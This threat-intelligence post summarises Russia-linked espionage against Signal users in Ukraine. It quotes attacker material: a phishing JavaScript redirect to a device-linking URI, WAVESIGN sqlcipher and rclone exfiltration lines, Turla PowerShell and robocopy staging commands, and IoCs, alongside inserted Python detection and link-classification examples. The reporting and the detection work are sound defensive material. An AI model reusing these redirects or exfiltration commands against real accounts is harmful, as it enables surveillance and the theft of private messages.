Russia-Linked Actors Exploiting Signal Messenger’s “Linked Devices” Feature for Espionage in Ukraine
Google Threat Intelligence Group has discovered a cyber espionage campaign by Russia-linked threat actors against Signal Messenger users; targets include Ukrainian military personnel, politicians, journalists and activists. The attacks combine phishing, malicious JavaScript payloads and trojanised programs, and abuse Signal's "linked devices" feature to steal sensitive communications. Google has worked with Signal to roll out security enhancements and recommends that users update the app and enable two-factor authentication to defend against this threat. 2025-2-20 13:30:49 Author: cyble.com

Overview 

Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia’s intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists. 

The tactics observed in this campaign include phishing attacks abusing Signal’s linked devices feature, malicious JavaScript payloads and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques. 

Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app. 

Tactics Used to Compromise Signal Accounts 

Exploiting Signal’s “Linked Devices” Feature 

Russia-aligned threat actors have manipulated Signal’s legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim’s account, enabling real-time message interception without full device compromise. 

The phishing methods used to deliver these malicious QR codes include: 

  • Fake Signal group invites containing altered JavaScript redirects. 
  • Phishing pages masquerading as Ukrainian military applications. 
  • Spoofed security alerts from Signal urging users to verify their accounts. 
  • Captured physical devices on the battlefield, where linked accounts are rerouted to adversary infrastructure for surveillance. 

Threat Actors and Their Techniques 

UNC5792: Manipulated Signal Group Invites 

UNC5792, a Russian-linked espionage cluster with overlaps to CERT-UA’s UAC-0195, has been observed altering legitimate Signal group invites to redirect users to malicious URLs. 

Instead of leading to a genuine group, the phishing page executes a redirect that links the victim’s Signal account to an attacker-controlled instance. 

JavaScript code modifications replace the expected Signal group URI with a device-linking command: 

function doRedirect() {
    var redirect = 'sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D';
    document.getElementById('go-to-group').href = redirect;
    window.location = redirect;
}

The domain infrastructure used for these phishing pages includes: 

  • signal-groups[.]tech   
  • signal-group[.]site   
  • add-signal-groups[.]com   
  • signal-security[.]online   
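To show what the redirect above looks like from the defender's side, here is an added Python example (not code from the Cyble post or the GTIG report) that classifies a link the way a message or mail filter could: it recognises the sgnl://linkdevice URI that the phishing page hands to the victim and extracts the pairing uuid, checks the host against the report's defanged domain IoCs, and flags any other "signal"-named host as a lookalike. The allowlist of legitimate Signal hosts and the https://signal.group/#... invite format are assumptions, and the sample page source and links are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Defanged phishing domains taken from the report's IoC lists (UNC5792 and UNC4221).
IOC_DOMAINS_DEFANGED = [
    "signal-groups[.]tech",
    "signal-group[.]site",
    "add-signal-groups[.]com",
    "signal-security[.]online",
    "signal-confirm[.]site",
    "teneta.add-group[.]site",
    "signal-protect[.]host",
]

# Assumption: hosts Signal itself uses for invite and contact links. Any other
# host with "signal" in its name is treated as a lookalike.
LEGITIMATE_SIGNAL_HOSTS = {"signal.group", "signal.org", "signal.me"}

# A device-linking URI embedded in page source, as in the doRedirect() snippet.
LINKDEVICE_RE = re.compile(r"sgnl://linkdevice\?[^\s'\"<>]+", re.IGNORECASE)

# Constructed sample: the redirect function quoted in the report, as it would
# appear in a fetched copy of the phishing page.
SAMPLE_PHISHING_JS = """
function doRedirect() {
    var redirect = 'sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D';
    document.getElementById('go-to-group').href = redirect;
    window.location = redirect;
}
"""


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'signal-groups[.]tech' back into a real host."""
    return indicator.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def classify_signal_link(href: str) -> dict:
    """Classify one link found in a message or on a landing page.

    'verdict' is one of: device_link (the URI that pairs a new device to the
    account), ioc_domain (host is in the published IoC list), lookalike_domain
    (a "signal" host Signal does not own), group_invite, or other.
    """
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()

    # A genuine group invite never uses the linkdevice path; the phishing page
    # swaps the invite for exactly this URI.
    if parts.scheme.lower() == "sgnl" and host == "linkdevice":
        uuid = parse_qs(parts.query).get("uuid", [""])[0]  # parse_qs decodes %3D -> '='
        return {"verdict": "device_link", "host": host, "uuid": uuid}
    if host in IOC_DOMAINS:
        return {"verdict": "ioc_domain", "host": host}
    if host == "signal.group" and parts.fragment:
        return {"verdict": "group_invite", "host": host}
    if "signal" in host and host not in LEGITIMATE_SIGNAL_HOSTS:
        return {"verdict": "lookalike_domain", "host": host}
    return {"verdict": "other", "host": host}


def find_linkdevice_uris(page_source: str) -> list:
    """Return every device-linking URI embedded in a page's HTML or JavaScript."""
    return LINKDEVICE_RE.findall(page_source)


if __name__ == "__main__":
    for uri in find_linkdevice_uris(SAMPLE_PHISHING_JS):
        print(uri, "->", classify_signal_link(uri))
```

The useful property for a filter is that the device-linking URI is a distinct scheme and path, so it can be blocked or flagged outright wherever a group invite is expected; the domain and lookalike checks catch the landing pages themselves before a user ever reaches the QR code.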

UNC4221: Tailored Signal Phishing Kits 

UNC4221, also known as UAC-0185, has specifically targeted Ukrainian military personnel using custom-built phishing kits that mimic the Kropyva artillery guidance system. 

  • Victims receive phishing messages containing fake Signal login pages or malicious QR codes disguised as group invites. 
  • The payload collects geolocation data and other device information using a lightweight JavaScript tool called PINPOINT. 
  • Infrastructure linked to UNC4221 includes: 
     • signal-confirm[.]site 
     • teneta.add-group[.]site 
     • signal-protect[.]host 

APT44: WAVESIGN Malware and Android Exploits 

APT44, also known as Sandworm (Seashell Blizzard), has used multiple methods to steal Signal messages, including: 

  1. WAVESIGN – a Windows Batch script designed to:  
     • Query Signal’s local database. 
     • Exfiltrate messages using Rclone, a tool for remote data transfer. 
     • Erase logs to evade detection. 

Batch file commands detected: 

C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
C:\ProgramData\Signal\Storage\rc.exe copy -P -I --log-file=C:\ProgramData\Signal\Storage\rclog.txt

  2. Chisel Android Malware  
     • Designed to recursively search for and extract Signal database files from compromised Android devices. 
     • Capable of exfiltrating data from multiple secure messaging applications, including WhatsApp and Telegram. 

Turla: PowerShell-Based Signal Data Theft 

Turla, attributed to Russia’s FSB (Center 16), has leveraged PowerShell scripts to exfiltrate Signal messages from compromised Windows desktops. 

  • The malware collects and compresses user data before uploading it to a remote server controlled by the attacker. 

PowerShell identified: 

Compress-Archive -Path "C:\Users\..\AppData\Roaming\SIGNAL\config.json" -DestinationPath $zipfile
Copy-Item -Path $zipfile -Destination $resfile -Force

UNC1151: Robocopy-Based Exfiltration 

UNC1151, a Belarus-aligned espionage group, has been observed using Robocopy to stage Signal message files for later exfiltration. 

robocopy "%userprofile%\AppData\Roaming\Signal" C:\Users\Public\data\signa /S
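The command lines quoted for APT44's WAVESIGN, Turla and UNC1151 share a shape that process-creation telemetry (Sysmon Event ID 1, EDR process events) can catch: a copying or archiving tool pointed at Signal's local profile, or sqlcipher pointed at its database. The Python below is an added example (not from the Cyble post or the cited reports) that turns each quoted command line into a regex rule and runs the rules over constructed process events; the user names, the key placeholder and the rclone destination in the samples are invented.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    rationale: str


# One rule per command line quoted in the report. Each pattern keys on the
# tool plus the Signal-specific argument, so an ordinary backup job or the
# Signal client starting does not fire it.
RULES = [
    Rule("wavesign_sqlcipher_recover",
         re.compile(r"sqlcipher(\.exe)?\b.*PRAGMA\s+key.*\.recover", re.I),
         "APT44 WAVESIGN: sqlcipher opened with a key and dumped via .recover"),
    Rule("wavesign_rclone_copy",
         re.compile(r"\b(rc|rclone)(\.exe)?\s+copy\b.*--log-file=", re.I),
         "APT44 WAVESIGN: rclone copy used to move the dump off the host"),
    Rule("turla_compress_signal_config",
         re.compile(r"Compress-Archive\b.*\\Roaming\\Signal\\config\.json", re.I),
         "Turla: PowerShell archives the Signal profile before upload"),
    Rule("unc1151_robocopy_signal_profile",
         re.compile(r"\brobocopy\b.*\\AppData\\Roaming\\Signal\b.*\\Users\\Public\\", re.I),
         "UNC1151: Robocopy stages the Signal profile under a world-readable path"),
]

# Constructed process-creation command lines (not real telemetry). The key,
# user name and rclone destination are placeholders.
SAMPLE_PROCESS_EVENTS = [
    # benign: the Signal desktop client starting normally
    r"C:\Users\user1\AppData\Local\Programs\signal-desktop\Signal.exe",
    # WAVESIGN: dump the SQLCipher-encrypted message store with the extracted key
    r"""C:\ProgramData\Signal\Storage\sqlcipher.exe db.sqlite "PRAGMA key=""x'KEY_PLACEHOLDER'"";" ".recover" > NUL""",
    # WAVESIGN: ship the dump out with rclone (destination is a placeholder)
    r"C:\ProgramData\Signal\Storage\rc.exe copy -P -I --log-file=C:\ProgramData\Signal\Storage\rclog.txt C:\ProgramData\Signal\Storage remote:placeholder",
    # Turla: archive the profile's config.json for upload
    r'powershell.exe -Command "Compress-Archive -Path C:\Users\user1\AppData\Roaming\Signal\config.json -DestinationPath C:\Users\Public\data.zip"',
    # UNC1151: stage the whole profile under C:\Users\Public
    r'robocopy "C:\Users\user1\AppData\Roaming\Signal" C:\Users\Public\data\signa /S',
]


def match_rules(command_line: str) -> list:
    """Names of every rule whose pattern appears in the command line."""
    return [rule.name for rule in RULES if rule.pattern.search(command_line)]


def triage(events) -> list:
    """(command_line, matched rule names) for each event that hit at least one rule."""
    hits = []
    for line in events:
        names = match_rules(line)
        if names:
            hits.append((line, names))
    return hits


if __name__ == "__main__":
    by_name = {rule.name: rule.rationale for rule in RULES}
    for line, names in triage(SAMPLE_PROCESS_EVENTS):
        for name in names:
            print(f"[{name}] {by_name[name]}\n    {line}")
```

The rules are deliberately narrow (tool plus the Signal profile or database path) so they stay quiet on a normal workstation; in a real deployment the same patterns would go into a Sysmon or SIEM query on the CommandLine field, and any hit on a host that also shows a new Signal linked device is worth an immediate look.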

Indicators of Compromise (IoCs) 

Domains Hosting Malicious Signal Phishing Pages 

signal-groups[.]tech   
add-signal-groups[.]com   
signal-confirm[.]site   
signal-protect[.]host   
teneta.add-group[.]site   

Malicious JavaScript and Malware Hashes 

e078778b62796bab2d7ab2b04d6b01bf   
a97a28276e4f88134561d938f60db495   
b27ff24870d93d651ee1d8e06276fa98   

IP Addresses Used in Attacks 

150.107.31[.]194:18000   
45.55.158.47   
87.249.138.47   
155.133.4.175   

Mitigation Strategies 

Potential targets of these cyber espionage campaigns can strengthen their defenses with the following measures: 

  1. Enable Screen Lock & Strong Passwords 
     • Use long, complex passwords with mixed characters and symbols. 
  2. Update Signal & Other Messaging Apps 
  3. Audit Linked Devices Regularly 
     • Navigate to Signal > Linked Devices and remove any unknown connections. 
  4. Be Wary of Phishing Links & QR Codes 
     • Do not scan QR codes from unverified sources. 
     • Avoid clicking on group invites from unknown contacts. 
  5. Enable Two-Factor Authentication (2FA) 
     • Use biometric authentication, hardware security keys, or one-time codes to prevent unauthorized access. 
  6. iPhone Users Should Enable Lockdown Mode 
     • iOS Lockdown Mode reduces the attack surface for high-risk targets. 

Conclusion 

The recent targeting of Signal Messenger by Russia-aligned threat actors represents a significant escalation in cyber espionage efforts. By leveraging phishing campaigns, malware, and post-compromise tactics, adversaries aim to steal sensitive communications from military personnel, journalists, and activists. 

With secure messaging applications becoming high-priority targets, users must adopt proactive security measures to prevent account compromise and data exfiltration. Organizations should also implement threat detection frameworks to identify suspicious account activity and malicious infrastructure linked to these campaigns. 

“The number of cyberattacks is constantly growing, and cyber threats are now a shared challenge for many countries. Therefore, it’s vital to build trusting relationships and create shared platforms for exchanging information about cyber incidents. This allows one country to quickly share data with partners for timely threat response and escalation prevention,”  said Oleksandr Potii, Head of the SSSCIP, at Munich Cyber Security Conference. 

“Cooperation benefits not only us but also our partners. We share our experience and expertise in responding to cyberattacks, while our partners assist us with new technologies. Together, we are building a common ecosystem for protecting cyberspace, countering global cyber threats, and adopting effective strategies for protecting critical infrastructure,” explained Potii. 

As threat actors refine their techniques, Signal, WhatsApp, and Telegram users should remain vigilant, update their applications, and employ best security practices to safeguard their communications against evolving cyber threats. 

References: 

https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger
https://cert.gov.ua/article/6279561
https://cip.gov.ua/en/news/oleksandr-potii-cyber-threats-are-a-shared-challenge-for-many-nations
https://cip.gov.ua/en/news/experienced-professionals-modern-technologies-and-collaboration-key-components-for-building-robust-cyber-defense
https://thecyberexpress.com/fake-military-apps-targeted-at-ukrainian-army




Source: https://cyble.com/blog/germany-strengthening-cybersecurity-2/